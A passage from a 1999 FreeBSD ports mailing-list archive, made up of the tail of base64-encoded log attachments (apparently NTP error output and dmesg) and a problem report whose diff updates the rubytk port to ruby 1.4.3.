VEsfNZWRV1LjvvESZ8Z4R9UmxAD0UtcLrVMNV7GQHjPkRO2VFTFPU+0TBuqL h5YlEEDexWYmTnfRfKMm3HTE1CcJVGE5kr0c3tl1lnRoFgrpNRkiyv0cLHoK +dRnOeTA0PVqAXQhmT8IkQGAw9MuehxTryEsXYY83qFgShWNdw0AkcHWSrjH gKNs1xCKa5kpttMQlW3jnEPziDOzcwRQUnh3u+UwdPcIBoDxLmMBg4QzfhfH Uu9x6J7NaFlgy+2jrzasn0Xt5XjZyQBu3bFSxOvOCVZIzK6C0CSsLApOiSWZ SDMnEzwlWZSFPPRsYzydvHt8nNnDBjySMVPwulSdUC0YWcgITmY4mHWWplIZ 96AARMC9AD8QrOV4rjiJ8qETboEK30bG0yxhVgwsZmRumNoEYlrFpSlGAUCu V4niHCVKB5CjHeqvapml4UQqODXtnJpMxAzqUAFJYts6iptMJbbuInJKtJgB 7CJz8FeEoQPsCym2lyqn07HHehrQlY+GznfRSrULN5oYVUa3rgNGlpGE0vmn rcEpmQKumlD2RBY0yrh9ePcv5D8+Otp0wXPuQnSwXAA8ECG3kDwvQt/p2giO dea6lnmRL2qWLTgwIVnYZKXoOOJJfcSC1w6F1Zdlnv/5SkYjcIp/+w3L5lSh TbME/cvrIA+9Vrof7IL81nAOFpFYD545SJFMZts0u+pxOWAdO4hwbFa+9iUT uy1xyWOoUKz3nSwhBbzmsC7SAMJOAGzbk9jHENr2DK7Gy6IyTWd+MuompyFd ejlgwW7a57FMeX1/IgnA/YpYFwSQylLPhECLIcK9RM09WzV+wp2Q+oh+H8To pqLoqWM6wTxiq9TtIJl0DNHtnxIZZrviIrXIxaVQmpnMRCJv8ripL16ygrNR SPeUUDyG0lOS6V3EGIlnFzskvUT4KcQNYj9kRVPDwcftiifZ1EtPZ74oRSIs WgnjiTicf4fwng0CHAu/YmJG7THpJS8489K0p8hEUqaxTesRLeOqLmkUm/uM DAiw6OC5iSbyTadsc9pNtYBubDu3bp1yhkqWrGfcmOon9+i2t+8hpeGzyfNB fcSc9uIkLjTES2IclkiyeMIRSxCqZhl2XDUeyNUs+v4Dip3sE6JPPAHMk0eu SutSJS+U7KALotIC7vyhAQa+/wAnvm3bKL6GYohYJ/iOoV2DQIAgQs4iatHV O3u4/gg+HYPjMI29w6NW1hPOphgGAeRJmNzPDjhFz2UWhSTTHBBOXppoGGYB mdTaV0yLhpdb3MIcji83sNcUW5FgMH7sfrv6euOReRZRRPC8sZhooiQNGdWG rDs1m44spCjYFwXuhl9/I4CqNFoRbHwjkjB/EZE7ZnvGogVKZkpmqbbdVnAk aAHlQSsVdbBSWRklzJilXdXNOOiNBt8fPPq9gzWhETdgBNlKSqS63zc433+o KTCnC/RJJG1reOVO5y4Icsd1Rl/6bnr/tj/YbVlp1c/xeYQNzIFvpOHgyxcf Lfg98E3DaGKnKEawEl+vh6Tfqc/klxiNfvdJ2DP+/YccXGsSi9ncQP3xRybA 5XmMQqjAD6skX1sBtU3eOItBDnYs7Gmowwq0DqFWAcLbk2Nkom5MAtYv667h 5WPv4cpu9f7tA/zkXug7VVap+CiEo3M2w084ljtdUjvfOlmB1pnhtqih5DoY EdAy0wZzEg7wU70+sdGFg0B8j1n0RPDMJqHQTKT4sVPmgljiWe+0FoqXBQp5 Bf8TVwmPSJxFYEi74311Ml1QEdGJiAAH4PoQgv0H1vR3yN7/zfcLCkViwjZX Vuk5wBI1CUaX45s8XF0xaa0Qcs3azGp43QuqSjli0koUCxlCTHqXAOxBf9C9 7d90Bw83RR0MlXI2nfK8jEVv2QxoH/mSZWVz3l+f45u2OXgV7OdGKnUpXNNe KWwQkhHqOxwGvW91ZVYMATB4yN3+4LY3ckijaSGospeO5krQyNHwqWgQ9B77 l/UMc01NFneuaIIbk0zYT6fnnW/3PWJP3Cll9ZgbqYyPMA3fDgPc0FzAsbFH BlUddr98PDkiRVx7wsEmvLv7gosaY19lgUNVBocqnDJh2d53SQ4euoPHHrmX RioZUfJt2Pk6IgNYm7Lqurd9yKcUNk+eLMrzD9/26EzY2hImSlqQZ4Jerpe7 Q1SGcbG0fM07hS67o4DYJi+cZ2rhLLMu1UQg9jk+uri47FxtGN3FzRTofx/c 7GLKsBeakJOTo6PLDnw/vtwzLATnpnM3yd27r/kyOoCUZOgaAVlsT77KUg9E MlRypmgcW7PbKAtsd6c+4h2g6Tm57baOj46OyPfv3zrwdbdjEXdDcn5xfnS6 b7FBlpD+Y/8215f49P3ChWFz0g2uyfkpaHAPqRf81LWBmytNrpV7CnujoIhx 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 ANMVAAAAAA== ------------=_945712072-17629-0 Content-Type: application/octet-stream; name="Ntp-err3.txt.gz" Content-Disposition: attachment; filename="Ntp-err3.txt.gz" Content-Transfer-Encoding: base64 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 ------------=_945712072-17629-0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 10:50: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 35DFC15378 for ; Mon, 20 Dec 1999 10:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA45916; Mon, 20 Dec 1999 10:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from smtp2.teleway.ne.jp (smtp2.teleway.ne.jp [203.140.129.37]) by hub.freebsd.org (Postfix) with ESMTP id 7C04014FF8 for ; Mon, 20 Dec 1999 10:43:58 -0800 (PST) (envelope-from yasuf@big.or.jp) Received: from localhost (kokura1-14.teleway.ne.jp [210.234.51.14]) by smtp2.teleway.ne.jp (8.9.3+3.2W/3.7W) with ESMTP id DAA14309 for ; Tue, 21 Dec 1999 03:43:56 +0900 (JST) (envelope-from yasuf@big.or.jp) Message-Id: <19991221034356S.yasuf@big.or.jp> Date: Tue, 21 Dec 1999 03:43:56 +0900 From: yasuf@big.or.jp Reply-To: yasuf@big.or.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15591: Update: x11-toolkits/rubytk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15591 >Category: ports >Synopsis: Update: x11-toolkits/rubytk >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 10:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Yasuhiro Fukuma >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: This patch contains: - Updates for ruby-1.4.3. >How-To-Repeat: >Fix: Index: rubytk/Makefile =================================================================== RCS file: /home/ncvs/ports/x11-toolkits/rubytk/Makefile,v retrieving revision 1.5 diff -u -r1.5 Makefile --- Makefile 1999/11/28 18:31:47 1.5 +++ Makefile 1999/12/20 18:15:03 @@ -1,5 +1,5 @@ # New ports collection makefile for: rubytk -# Version required: 1.4.2 +# Version required: 1.4.3 # Date created: 15 March 1999 # Whom: Yasuhiro Fukuma # @@ -33,7 +33,7 @@ --with-X11-dir="${X11BASE}" PLIST_SUB+= RUBY_VER="${RUBY_VER}" RUBY_ARCH="${RUBY_ARCH}" -VERSION= 1.4.2 +VERSION= 1.4.3 BRANCH_NAME= 1.4 RUBY_VER= 1.4 Index: rubytk/files/md5 =================================================================== RCS file: /home/ncvs/ports/x11-toolkits/rubytk/files/md5,v retrieving revision 1.3 diff -u -r1.3 md5 --- md5 1999/11/14 01:38:59 1.3 +++ md5 1999/12/09 22:50:51 @@ -1 +1 @@ -MD5 (ruby-1.4.2.tar.gz) = 13c18f8cfa0cb0bf1268942cfc04c462 +MD5 (ruby-1.4.3.tar.gz) = ff2df3fa6855e087998bf5d1fb6dfbd9 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 20 10:50:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 972B815372 for ; Mon, 20 Dec 1999 10:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA45907; Mon, 20 Dec 1999 10:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from 